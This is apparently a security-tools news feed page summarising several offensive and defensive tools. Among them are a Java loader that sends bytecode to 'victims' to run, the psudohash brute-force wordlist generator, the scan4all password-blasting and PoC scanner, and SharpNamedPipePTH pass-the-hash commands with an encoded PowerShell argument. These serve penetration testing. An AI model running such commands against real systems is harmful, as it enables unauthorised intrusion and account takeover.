🔒
❌
There are new articles available, click to refresh the page.
Yesterday — 4 October 2022Tools

Utkuici - Nessus Automation

4 October 2022 at 11:30
By: Zion3R


Today, with the spread of information technology systems, investments in the field of cyber security have increased to a great extent. Vulnerability management, penetration tests and various analyzes are carried out to accurately determine how much our institutions can be affected by cyber threats. With Tenable Nessus, the industry leader in vulnerability management tools, an IP address that has just joined the corporate network, a newly opened port, exploitable vulnerabilities can be determined, and a python application that can work integrated with Tenable Nessus has been developed to automatically identify these processes.


Features

  • Finding New IP Address
  • Finding New Port
  • Finding New Exploitable Vulnerability

Installation

git clone https://github.com/anil-yelken/Nessus-Automation cd Nessus-Automation sudo pip3 install requirements.txt

Usage

The SIEM IP address in the codes should be changed.

In order to detect a new IP address exactly, it was checked whether the phrase "Host Discovery" was used in the Nessus scan name, and the live IP addresses were recorded in the database with a timestamp, and the difference IP address was sent to SIEM. The contents of the hosts table were as follows:

Usage: python finding-new-ip-nessus.py

By checking the port scans made by Nessus, the port-IP-time stamp information is recorded in the database, it detects a newly opened service over the database and transmits the data to SIEM in the form of "New Port:" port-IP-time stamp. The result observed by SIEM is as follows:

Usage: python finding-new-port-nessus.py

In the findings of vulnerability scans made in institutions and organizations, primarily exploitable vulnerabilities should be closed. At the same time, it records the vulnerabilities in the database that can be exploited with metasploit in the institutions and transmits this information to SIEM when it finds a different exploitable vulnerability on the systems. Exploitable vulnerabilities observed by SIEM:

Usage: python finding-exploitable-service-nessus.py

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Before yesterdayTools

Java-Remote-Class-Loader - Tool to send Java bytecode to your victims to load and execute using Java ClassLoader together with Reflect API

3 October 2022 at 11:30
By: Zion3R


This tool allows you to send Java bytecode in the form of class files to your clients (or potential targets) to load and execute using Java ClassLoader together with Reflect API. The client receives the class file from the server and return the respective execution output. Payloads must be written in Java and compiled before starting the server.


Features

  • Client-server architecture
  • Remote loading of Java class files
  • In-transit encryption using ChaCha20 cipher
  • Settings defined via args
  • Keepalive mechanism to re-establish communication if server restarts

Installation

Tool has been tested using OpenJDK 11 with JRE Java Package, both on Windows and Linux (zip portable version). Java version should be 11 or higher due to dependencies.

https://www.openlogic.com/openjdk-downloads

Usage

$ java -jar java-class-loader.jar -help

usage: Main
-address <arg> address to connect (client) / to bind (server)
-classfile <arg> filename of bytecode .class file to load remotely
(default: Payload.class)
-classmethod <arg> name of method to invoke (default: exec)
-classname <arg> name of class (default: Payload)
-client run as client
-help print this message
-keepalive keeps the client getting classfile from server every
X seconds (default: 3 seconds)
-key <arg> secret key - 256 bits in base64 format (if not
specified it will generate a new one)
-port <arg> port to connect (client) / to bind (server)
-server run as server

Example

Assuming you have the following Hello World payload in the Payload.java file:

//Payload.java
public class Payload {
public static String exec() {
String output = "";
try {
output = "Hello world from client!";
} catch (Exception e) {
e.printStackTrace();
}
return output;
}
}

Then you should compile and produce the respective Payload.class file.

To run the server process listening on port 1337 on all net interfaces:

$ java -jar java-class-loader.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.class

Running as server
Server running on 0.0.0.0:1337
Generated new key: TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

On the client side, you may use the same JAR package with the -client flag and use the symmetric key generated by server. Specify the server IP address and port to connect to. You may also change the class name and class method (defaults are Payload and String exec() respectively). Additionally, you can specify -keepalive to keep the client requesting class file from server while maintaining the connection.

$ java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 -key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

Running as client
Connecting to 192.168.1.73:1337
Received 593 bytes from server
Output from invoked class method: Hello world from client!
Sent 24 bytes to server

References

Refer to https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/ for a blog post related with the development of this tool.

  1. https://github.com/rebeyond/Behinder

  2. https://github.com/AntSwordProject/antSword

  3. https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/

  4. https://www.sangfor.com/blog/cybersecurity/behinder-v30-analysis

  5. https://xz.aliyun.com/t/2799

  6. https://medium.com/@m01e/jsp-webshell-cookbook-part-1-6836844ceee7

  7. https://venishjoe.net/post/dynamically-load-compiled-java-class/

  8. https://users.cs.jmu.edu/bernstdh/web/common/lectures/slides_class-loaders_remote.php

  9. https://www.javainterviewpoint.com/chacha20-poly1305-encryption-and-decryption/

  10. https://openjdk.org/jeps/329

  11. https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/ClassLoader.html

  12. https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/reflect/Method.html



Bayanay - Python Wardriving Tool

2 October 2022 at 11:30
By: Zion3R


WarDriving is the act of navigating, on foot or by car, to discover wireless networks in the surrounding area.

Features

Wardriving is done by combining the SSID information obtained with scapy using the HTML5 geolocation feature.


Usage

I cannot be held responsible for the malicious use of the vehicle.

ssidBul.py has been tested via TP-LINK TL WN722N.

Selenium 3.11.0 and Firefox 59.0.2 are used for location.py. Firefox geckodriver is located in the directory where the codes are.

SSID and MAC names and location information were created and changed in the test environment.

ssidBul.py and location.py must be run concurrently.

ssidBul.py result:

20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Here is a screenshot of allowing location information while running location.py:

The screenshot of the location information is as follows:

konum.py result:

lat=38.8333635|lon=34.759741899|20 March 2018 11:47PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

After the data collection processes, the following output is obtained as a result of running wardriving.py:

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Deadfinder - Find Dead-Links (Broken Links)

1 October 2022 at 11:30
By: Zion3R


Dead link (broken link) means a link within a web page that cannot be connected. These links can have a negative impact to SEO and Security. This tool makes it easy to identify and modify.


Installation

Install with Gem

gem install deadfinder

Docker Image

docker pull ghcr.io/hahwul/deadfinder:latest

Usage

Commands:
deadfinder file # Scan the URLs from File. (e.g deadfinder file urls.txt)
deadfinder help [COMMAND] # Describe available commands or one specific command
deadfinder pipe # Scan the URLs from STDIN. (e.g cat urls.txt | deadfinder pipe)
deadfinder sitemap # Scan the URLs from sitemap.
deadfinder url # Scan the Single URL.
deadfinder version # Show version.

Options:
c, [--concurrency=N] # Set Concurrncy
# Default: 20
t, [--timeout=N] # Set HTTP Timeout
# Default: 10
o, [--output=OUTPUT] # Save JSON Result

Modes

# Scan the URLs from STDIN (multiple URLs)
cat urls.txt | deadfinder pipe

# Scan the URLs from File. (multiple URLs)
deadfinder file urls.txt

# Scan the Single URL.
deadfinder url https://www.hahwul.com

# Scan the URLs from sitemap. (multiple URLs)
deadfinder sitemap https://www.hahwul.com/sitemap.xml

JSON Handling

deadfinder sitemap https://www.hahwul.com/sitemap.xml \
-o output.json

cat output.json | jq


Pmanager - Store And Retrieve Your Passwords From A Secure Offline Database. Check If Your Passwords Has Leaked Previously To Prevent Targeted Password Reuse Attacks

30 September 2022 at 11:30
By: Zion3R


Demo

Description

Store and retrieve your passwords from a secure offline database. Check if your passwords has leaked previously to prevent targeted password reuse attacks.


Why develop another password manager ?

  • This project was initially born from my desire to learn Rust.
  • I was tired of using the clunky GUI of keepassxc.
  • I wanted to learn more about cryptography.
  • For fun. :)

Features

  • Secure password storage with state of the art cryptographic algorithms.
    • Multiple iterations of argon2id for key derivation to make it harder for attacker to conduct brute force attacks.
    • Aes-gcm256 for database encryption.
  • Custom encrypted key-value database which ensures data integrity.(Read the blog post I wrote about it here.)
  • Easy to install and to use. Does not require connection to an external service for its core functionality.
  • Check if your passwords are leaked before to avoid targeted password reuse attacks.
    • This works by hashing your password with keccak-512 and sending the first 10 digits to XposedOrNot.

Installation

Pmanager depends on "pkg-config" and "libssl-dev" packages on ubuntu. Simply install them with

sudo apt install pkg-config libssl-dev -y

Download the binary file according to your current OS from releases, and add the binary location to PATH environment variable and you are good to go.

Building from source

Ubuntu & WSL

sudo apt update -y && sudo apt install curl
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
sudo apt install build-essential -y
sudo apt install pkg-config libssl-dev git -y
git clone https://github.com/yukselberkay/pmanager
cd pmanager
make install

Windows

git clone https://github.com/yukselberkay/pmanager
cd pmanager
cargo build --release

Mac

I have not been able to test pmanager on a Mac system. But you should be able to build it from the source ("cargo build --release"). since there are no OS specific functionality.

Documentation

Firstly the database needs to be initialized using "init" command.

Init

# Initializes the database in the home directory.
pmanager init --db-path ~

Insert

# Insert a new user and password pair to the database.
pmanager insert --domain github.com

Get

# Get a specific record by domain.
pmanager get --domain github.com

List

# List every record in the database.
pmanager list

Update

# Update a record by domain.
pmanager update --domain github.com

Delete

# Deletes a record associated with domain from the database.
pmanager delete github.com

Leaked

# Check if a password in your database is leaked before.
pmanager leaked --domain github.com
pmanager 1.0.0

USAGE:
pmanager [OPTIONS] [SUBCOMMAND]

OPTIONS:
-d, --debug
-h, --help Print help information
-V, --version Print version information

SUBCOMMANDS:
delete Delete a key value pair from database
get Get value by domain from database
help Print this message or the help of the given subcommand(s)
init Initialize pmanager
insert Insert a user password pair associated with a domain to database
leaked Check if a password associated with your domain is leaked. This option uses
xposedornot api. This check achieved by hashing specified domain's password and
sending the first 10 hexade cimal characters to xposedornot service
list Lists every record in the database
update Update a record from database

Roadmap

  • Unit tests
  • Automatic copying to clipboard and cleaning it.
  • Secure channel to share passwords in a network.
  • Browser extension which integrates with offline database.

Support

Bitcoin Address -> bc1qrmcmgasuz78d0g09rllh9upurnjwzpn07vmmyj



SpyCast - A Crossplatform mDNS Enumeration Tool

29 September 2022 at 11:30
By: Zion3R


SpyCast is a crossplatform mDNS enumeration tool that can work either in active mode by recursively querying services, or in passive mode by only listening to multicast packets.


Building

cargo build --release

OS specific bundle packages (for example dmg and app bundles on OSX) can be built via:

cargo tauri build

SpyCast can also be built without the default UI, in which case all output will be printed on the terminal:

cargo build --no-default-features --release

Running

Run SpyCast in active mode (it will recursively query all available mDNS services):

./target/release/spycast

Run in passive mode (it won't produce any mDNS traffic and only listen for multicast packets):

./target/release/spycast --passive

Other options

Run spycast --help for the complete list of options.

License

This project is made with ♥ by @evilsocket and it is released under the GPL3 license.


Psudohash - Password List Generator That Focuses On Keywords Mutated By Commonly Used Password Creation Patterns

28 September 2022 at 20:31
By: Zion3R


psudohash is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. It is keyword-based and highly customizable.


Pentesting Corporate Environments

System administrators and other employees often use a mutated version of the Company's name to set passwords (e.g. [email protected]_2022). This is commonly the case for network devices (Wi-Fi access points, switches, routers, etc), application or even domain accounts. With the most basic options, psudohash can generate a wordlist with all possible mutations of one or multiple keywords, based on common character substitution patterns (customizable), case variations, strings commonly used as padding and more. Take a look at the following example:

 

The script includes a basic character substitution schema. You can add/modify character substitution patterns by editing the source and following the data structure logic presented below (default):

transformations = [
{'a' : '@'},
{'b' : '8'},
{'e' : '3'},
{'g' : ['9', '6']},
{'i' : ['1', '!']},
{'o' : '0'},
{'s' : ['$', '5']},
{'t' : '7'}
]

Individuals

When it comes to people, i think we all have (more or less) set passwords using a mutation of one or more words that mean something to us e.g., our name or wife/kid/pet/band names, sticking the year we were born at the end or maybe a super secure padding like "[email protected]#". Well, guess what?

Installation

No special requirements. Just clone the repo and make the script executable:

git clone https://github.com/t3l3machus/psudohash
cd ./psudohash
chmod +x psudohash.py

Usage

./psudohash.py [-h] -w WORDS [-an LEVEL] [-nl LIMIT] [-y YEARS] [-ap VALUES] [-cpb] [-cpa] [-cpo] [-o FILENAME] [-q]

The help dialog [ -h, --help ] includes usage details and examples.

Usage Tips

  1. Combining options --years and --append-numbering with a --numbering-limit ≥ last two digits of any year input, will most likely produce duplicate words because of the mutation patterns implemented by the tool.
  2. If you add custom padding values and/or modify the predefined common padding values in the source code, in combination with multiple optional parameters, there is a small chance of duplicate words occurring. psudohash includes word filtering controls but for speed's sake, those are limited.

Future

I'm gathering information regarding commonly used password creation patterns to enhance the tool's capabilities.



Scan4All - Vuls Scan: 15000+PoCs; 21 Kinds Of Application Password Crack; 7000+Web Fingerprints; 146 Protocols And 90000+ Rules Port Scanning; Fuzz, HW, Awesome BugBounty...

28 September 2022 at 11:30
By: Zion3R

  • What is scan4all: integrated vscan, nuclei, ksubdomain, subfinder, etc., fully automated and intelligent。red team tools Code-level optimization, parameter optimization, and individual modules, such as vscan filefuzz, have been rewritten for these integrated projects. In principle, do not repeat the wheel, unless there are bugs, problems
  • Cross-platform: based on golang implementation, lightweight, highly customizable, open source, supports Linux, windows, mac os, etc.
  • Support [21] password blasting, support custom dictionary, open by "priorityNmap": true
    • RDP
    • SSH
    • rsh-spx
    • Mysql
    • MsSql
    • Oracle
    • Postgresql
    • Redis
    • FTP
    • Mongodb
    • SMB, also detect MS17-010 (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, CVE-2017-0148), SmbGhost (CVE- 2020-0796)
    • Telnet
    • Snmp
    • Wap-wsp (Elasticsearch)
    • RouterOs
    • HTTP BasicAuth
    • Weblogic, enable nuclei through enableNuclei=true at the same time, support T3, IIOP and other detection
    • Tomcat
    • Jboss
    • Winrm(wsman)
    • POP3
  • By default, http password intelligent blasting is enabled, and it will be automatically activated when an HTTP password is required, without manual intervention
  • Detect whether there is nmap in the system, and enable nmap for fast scanning through priorityNmap=true, which is enabled by default, and the optimized nmap parameters are faster than masscan Disadvantages of using nmap: Is the network bad, because the traffic network packet is too large, which may lead to incomplete results Using nmap additionally requires setting the root password to an environment variable

  export PPSSWWDD=yourRootPswd 

More references: config/doNmapScan.sh By default, naabu is used to complete port scanning -stats=true to view the scanning progress Can I not scan ports?

noScan=true ./scan4all -l list.txt -v
# nmap result default noScan=true
./scan4all -l nmapRssuilt.xml -v
  • Fast 15000+ POC detection capabilities, PoCs include:
    • nuclei POC

    Nuclei Templates Top 10 statistics

TAG COUNT AUTHOR COUNT DIRECTORY COUNT SEVERITY COUNT TYPE COUNT
cve 1294 daffainfo 605 cves 1277 info 1352 http 3554
panel 591 dhiyaneshdk 503 exposed-panels 600 high 938 file 76
lfi 486 pikpikcu 321 vulnerabilities 493 medium 766 network 50
xss 439 pdteam 269 technologies 266 critical 436 dns 17
wordpress 401 geeknik 187 exposures 254 low 211
exposure 355 dwisiswant0 169 misconfiguration 207 unknown 7
cve2021 322 0x_akoko 154 token-spray 206
rce 313 princechaddha 147 workflows 187
wp-plugin 297 pussycat0x 128 default-logins 101
tech 282 gy741 126 file 76

281 directories, 3922 files.

  • vscan POC
    • vscan POC includes: xray 2.0 300+ POC, go POC, etc.
  • scan4all POC
  • Support 7000+ web fingerprint scanning, identification:

    • httpx fingerprint
      • vscan fingerprint
      • vscan fingerprint: including eHoleFinger, localFinger, etc.
    • scan4all fingerprint
  • Support 146 protocols and 90000+ rule port scanning

    • Depends on protocols and fingerprints supported by nmap
  • Fast HTTP sensitive file detection, can customize dictionary

  • Landing page detection

  • Supports multiple types of input - STDIN/HOST/IP/CIDR/URL/TXT

  • Supports multiple output types - JSON/TXT/CSV/STDOUT

  • Highly integratable: Configurable unified storage of results to Elasticsearch [strongly recommended]

  • Smart SSL Analysis:

    • In-depth analysis, automatically correlate the scanning of domain names in SSL information, such as *.xxx.com, and complete subdomain traversal according to the configuration, and the result will automatically add the target to the scanning list
    • Support to enable *.xx.com subdomain traversal function in smart SSL information, export EnableSubfinder=true, or adjust in the configuration file
  • Automatically identify the case of multiple IPs associated with a domain (DNS), and automatically scan the associated multiple IPs

  • Smart processing:

      1. When the IPs of multiple domain names in the list are the same, merge port scans to improve efficiency
      1. Intelligently handle http abnormal pages, and fingerprint calculation and learning
  • Automated supply chain identification, analysis and scanning

  • Link python3 log4j-scan

    • This version blocks the bug that your target information is passed to the DNS Log Server to avoid exposing vulnerabilities
    • Added the ability to send results to Elasticsearch for batch, touch typing
    • There will be time in the future to implement the golang version how to use?
mkdir ~/MyWork/;cd ~/MyWork/;git clone https://github.com/hktalent/log4j-scan
  • Intelligently identify honeypots and skip targets. This function is disabled by default. You can set EnableHoneyportDetection=true to enable

  • Highly customizable: allow to define your own dictionary through config/config.json configuration, or control more details, including but not limited to: nuclei, httpx, naabu, etc.

  • support HTTP Request Smuggling: CL-TE、TE-CL、TE-TE、CL_CL、BaseErr 


  • Support via parameter Cookie='PHPSession=xxxx' ./scan4all -host xxxx.com, compatible with nuclei, httpx, go-poc, x-ray POC, filefuzz, http Smuggling

work process


how to install

download from Releases

go install github.com/hktalent/[email protected]
scan4all -h

how to use

    1. Start Elasticsearch, of course you can use the traditional way to output, results
mkdir -p logs data
docker run --restart=always --ulimit nofile=65536:65536 -p 9200:9200 -p 9300:9300 -d --name es -v $PWD/logs:/usr/share/elasticsearch/logs -v $PWD /config/elasticsearch.yml:/usr/share/elasticsearch/config/elasticsearch.yml -v $PWD/config/jvm.options:/usr/share/elasticsearch/config/jvm.options -v $PWD/data:/ usr/share/elasticsearch/data hktalent/elasticsearch:7.16.2
# Initialize the es index, the result structure of each tool is different, and it is stored separately
./config/initEs.sh

# Search syntax, more query methods, learn Elasticsearch by yourself
http://127.0.0.1:9200/nmap_index/_doc/_search?q=_id:192.168.0.111
where 92.168.0.111 is the target to query
  • Please install nmap by yourself before use Using Help
go build
# Precise scan url list UrlPrecise=true
UrlPrecise=true ./scan4all -l xx.txt
# Disable adaptation to nmap and use naabu port to scan its internally defined http-related ports
priorityNmap=false ./scan4all -tp http -list allOut.txt -v

Work Plan

  • Integrate web-cache-vulnerability-scanner to realize HTTP smuggling smuggling and cache poisoning detection
  • Linkage with metasploit-framework, on the premise that the system has been installed, cooperate with tmux, and complete the linkage with the macos environment as the best practice
  • Integrate more fuzzers , such as linking sqlmap
  • Integrate chromedp to achieve screenshots of landing pages, detection of front-end landing pages with pure js and js architecture, and corresponding crawlers (sensitive information detection, page crawling)
  • Integrate nmap-go to improve execution efficiency, dynamically parse the result stream, and integrate it into the current task waterfall
  • Integrate ksubdomain to achieve faster subdomain blasting
  • Integrate spider to find more bugs
  • Semi-automatic fingerprint learning to improve accuracy; specify fingerprint name, configure

Q & A

  • how use Cookie?
  • libpcap related question

more see: discussions

Changelog

  • 2022-07-20 fix and PR nuclei #2301 并发多实例的bug
  • 2022-07-20 add web cache vulnerability scanner
  • 2022-07-19 PR nuclei #2308 add dsl function: substr aes_cbc
  • 2022-07-19 添加dcom Protocol enumeration network interfaces
  • 2022-06-30 嵌入式集成私人版本nuclei-templates 共3744个YAML POC; 1、集成Elasticsearch存储中间结果 2、嵌入整个config目录到程序中
  • 2022-06-27 优化模糊匹配,提高正确率、鲁棒性;集成ksubdomain进度
  • 2022-06-24 优化指纹算法;增加工作流程图
  • 2022-06-23 添加参数ParseSSl,控制默认不深度分析SSL中的DNS信息,默认不对SSL中dns进行扫描;优化:nmap未自动加.exe的bug;优化windows下缓存文件未优化体积的bug
  • 2022-06-22 集成11种协议弱口令检测、密码爆破:ftp、mongodb、mssql、mysql、oracle、postgresql、rdp、redis、smb、ssh、telnet,同时优化支持外挂密码字典
  • 2022-06-20 集成Subfinder,域名爆破,启动参数导出EnableSubfinder=true,注意启动后很慢; ssl证书中域名信息的自动深度钻取 允许通过 config/config.json 配置定义自己的字典,或设置相关开关
  • 2022-06-17 优化一个域名多个IP的情况,所有IP都会被端口扫描,然后按照后续的扫描流程
  • 2022-06-15 此版本增加了过去实战中获得的几个weblogic密码字典和webshell字典
  • 2022-06-10 完成核的整合,当然包括核模板的整合
  • 2022-06-07 添加相似度算法来检测 404
  • 2022-06-07 增加http url列表精准扫描参数,根据环境变量UrlPrecise=true开启


pyFlipper - Unoffical Flipper Zero Cli Wrapper Written In Python

27 September 2022 at 11:30
By: Zion3R


Unoffical Flipper Zero cli wrapper written in Python

Functions and characteristics:

  • Flipper serial CLI wrapper
  • Websocket client interface

Setup instructions:

$ git clone https://github.com/wh00hw/pyFlipper.git
$ cd pyFlipper
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install -r requirements.txt

Tested on:

  • Python 3.8.10 on Linux 5.4.0 x86_64
  • Python 3.10.5 on Android 12 (Termux + OTGSerial2WebSocket NO ROOT REQUIRED)

Usage/Examples

Connection

from pyflipper import PyFlipper

#Local serial port
flipper = PyFlipper(com="/dev/ttyACM0")

#OR

#Remote serial2websocket server
flipper = PyFlipper(ws="ws://192.168.1.5:1337")

Power

#Info
info = flipper.power.info()

#Poweroff
flipper.power.off()

#Reboot
flipper.power.reboot()

#Reboot in DFU mode
flipper.power.reboot2dfu()

Update/Backup

#Install update from .fuf file
flipper.update.install(fuf_file="/ext/update.fuf")

#Backup Flipper to .tar file
flipper.update.backup(dest_tar_file="/ext/backup.tar")

#Restore Flipper from backup .tar file
flipper.update.restore(bak_tar_file="/ext/backup.tar")

Loader

#List installed apps
apps = flipper.loader.list()

#Open app
flipper.loader.open(app_name="Clock")

Flipper Info

bluetooth info bt_info = flipper.bt.info()">
#Get flipper date
date = flipper.date.date()

#Get flipper timestamp
timestamp = flipper.date.timestamp()

#Get the processes dict list
ps = flipper.ps.list()

#Get device info dict
device_info = flipper.device_info.info()

#Get heap info dict
heap = flipper.free.info()

#Get free_blocks string
free_blocks = flipper.free.blocks()

#Get bluetooth info
bt_info = flipper.bt.info()

Storage

Filesystem Info

#Get the storage filesystem info
ext_info = flipper.storage.info(fs="/ext")

Explorer

#Get the storage /ext dict
ext_list = flipper.storage.list(path="/ext")

#Get the storage /ext tree dict
ext_tree = flipper.storage.tree(path="/ext")

#Get file info
file_info = flipper.storage.stat(file="/ext/foo/bar.txt")

#Make directory
flipper.storage.mkdir(new_dir="/ext/foo")

Files

generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable. The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc. """ flipper.storage.write.send(text_two) time.sleep(3) #Don't forget to stop flipper.storage.write.stop()">
#Read file
plain_text = flipper.storage.read(file="/ext/foo/bar.txt")

#Remove file
flipper.storage.remove(file="/ext/foo/bar.txt")

#Copy file
flipper.storage.copy(src="/ext/foo/source.txt", dest="/ext/bar/destination.txt")

#Rename file
flipper.storage.rename(file="/ext/foo/bar.txt", new_file="/ext/foo/rab.txt")

#MD5 Hash file
md5_hash = flipper.storage.md5(file="/ext/foo/bar.txt")

#Write file in one chunk
file = "/ext/bar.txt"

text = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.file(file, text)

#Write file using a listener
file = "/ext/foo.txt"

text_one = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.start(file)

time.sleep(2)

flipper.storage.write.send(text_one)

text_two = """All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as
necessary, making this the first true generator on the Internet.
It uses a dictionary of over 200 Latin words, combined with a handful of
model sentence structures, to generate Lorem Ipsum which looks reasonable.
The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc.
"""
flipper.storage.write.send(text_two)

time.sleep(3)

#Don't forget to stop
flipper.storage.write.stop()

LED/Backlight

#Set generic led on (r,b,g,bl)
flipper.led.set(led='r', value=255)

#Set blue led off
flipper.led.blue(value=0)

#Set green led value
flipper.led.green(value=175)

#Set backlight on
flipper.led.backlight_on()

#Set backlight off
flipper.led.backlight_off()

#Turn off led
flipper.led.off()

Vibro

#Set vibro True or False
flipper.vibro.set(True)

#Set vibro on
flipper.vibro.on()

#Set vibro off
flipper.vibro.off()

GPIO

#Set gpio mode: 0 - input, 1 - output
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

#Read gpio pin value
flipper.gpio.read(pin_name=PIN_NAME)

#Set gpio pin value
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

MusicPlayer

#Play song in RTTTL format
rttl_song = "Littleroot Town - Pokemon:d=4,o=5,b=100:8c5,8f5,8g5,4a5,8p,8g5,8a5,8g5,8a5,8a#5,8p,4c6,8d6,8a5,8g5,8a5,8c#6,4d6,4e6,4d6,8a5,8g5,8f5,8e5,8f5,8a5,4d6,8d5,8e5,2f5,8c6,8a#5,8a#5,8a5,2f5,8d6,8a5,8a5,8g5,2f5,8p,8f5,8d5,8f5,8e5,4e5,8f5,8g5"

#Play in loop
flipper.music_player.play(rtttl_code=rttl_song)

#Stop loop
flipper.music_player.stop()

#Play for 20 seconds
flipper.music_player.play(rtttl_code=rttl_song, duration=20)

#Beep
flipper.music_player.beep()

#Beep for 5 seconds
flipper.music_player.beep(duration=5)

NFC

#Synchronous default timeout 5 seconds

#Detect NFC
nfc_detected = flipper.nfc.detect()

#Emulate NFC
flipper.nfc.emulate()

#Activate field
flipper.nfc.field()

RFID

#Synchronous default timeout 5 seconds

#Read RFID
rfid = flipper.rfid.read()

SubGhz

#Transmit hex_key N times(default count = 10)
flipper.subghz.tx(hex_key="DEADBEEF", frequency=433920000, count=5)

#Decode raw .sub file
decoded = flipper.subghz.decode_raw(sub_file="/ext/subghz/foo.sub")

Infrared

#Transmit hex_address and hex_command selecting a protocol
flipper.ir.tx(protocol="Samsung32", hex_address="C000FFEE", hex_command="DEADBEEF")

#Raw Transmit samples
flipper.ir.tx_raw(frequency=38000, duty_cycle=0.33, samples=[1337, 8888, 3000, 5555])

#Synchronous default timeout 5 seconds
#Receive tx
r = flipper.ir.rx(timeout=10)

IKEY

#Read (default timeout 5 seconds)
ikey = flipper.ikey.read()

#Write (default timeout 5 seconds)
ikey = flipper.ikey.write(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

#Emulate (default timeout 5 seconds)
flipper.ikey.emulate(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

Log

#Attach event logger (default timeout 10 seconds)
logs = flipper.log.attach()

Debug

#Activate debug mode
flipper.debug.on()

#Deactivate debug mode
flipper.debug.off()

Onewire

#Search
response = flipper.onewire.search()

I2C

#Get
response = flipper.i2c.get()

Input

#Input dump
dump = flipper.input.dump()

#Send input
flipper.input.send("up", "press")

Optimizations

Feel free to contribute in any way

  • Queue Thread orchestrator (check dev branch)
  • Implement all the cli functions
  • Async SubGhz Chat (check dev branch)

License

MIT

Buy me a pint

ZEC: zs13zdde4mu5rj5yjm2kt6al5yxz2qjjjgxau9zaxs6np9ldxj65cepfyw55qvfp9v8cvd725f7tz7

ETH: 0xef3cF1Eb85382EdEEE10A2df2b348866a35C6A54

BTC: 15umRZXBzgUacwLVgpLPoa2gv7MyoTrKat

Contacts

  • Discord: white_rabbit#4124
  • Twitter: @nic_whr
  • GPG: 0x94EDEADC


SharpNamedPipePTH - Pass The Hash To A Named Pipe For Token Impersonation

26 September 2022 at 11:30
By: Zion3R


This project is a C# tool to use Pass-the-Hash for authentication on a local Named Pipe for user Impersonation. You need a local administrator or SEImpersonate rights to use this. There is a blog post for explanation:

https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/

It is heavily based on the code from the project Sharp-SMBExec.

I faced certain Offensive Security project situations in the past, where I already had the NTLM-Hash of a low privileged user account and needed a shell for that user on the current compromised system - but that was not possible with the current public tools. Imagine two more facts for a situation like that - the NTLM Hash could not be cracked and there is no process of the victim user to execute shellcode in it or to migrate into that process. This may sound like an absurd edge-case for some of you. I still experienced that multiple times. Not only in one engagement I spend a lot of time searching for the right tool/technique in that specific situation.

My personal goals for a tool/technique were:

  • Fully featured shell or C2-connection as the victim user-account
  • It must to able to also Impersonate low privileged accounts - depending on engagement goals it might be needed to access a system with a specific user such as the CEO, HR-accounts, SAP-administrators or others
  • The tool can be used as C2-module

The impersonated user unfortunately has no network authentication allowed, as the new process is using an Impersonation Token which is restricted. So you can only use this technique for local actions with another user.

There are two ways to use SharpNamedPipePTH. Either you can execute a binary (with or without arguments):

SharpNamedPipePTH.exe username:testing hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:C:\windows\system32\cmd.exe

SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" arguments:"-nop -w 1 -sta -enc bgBvAHQAZQBwAGEAZAAuAGUAeABlAAoA"

Or you can execute shellcode as the other user:

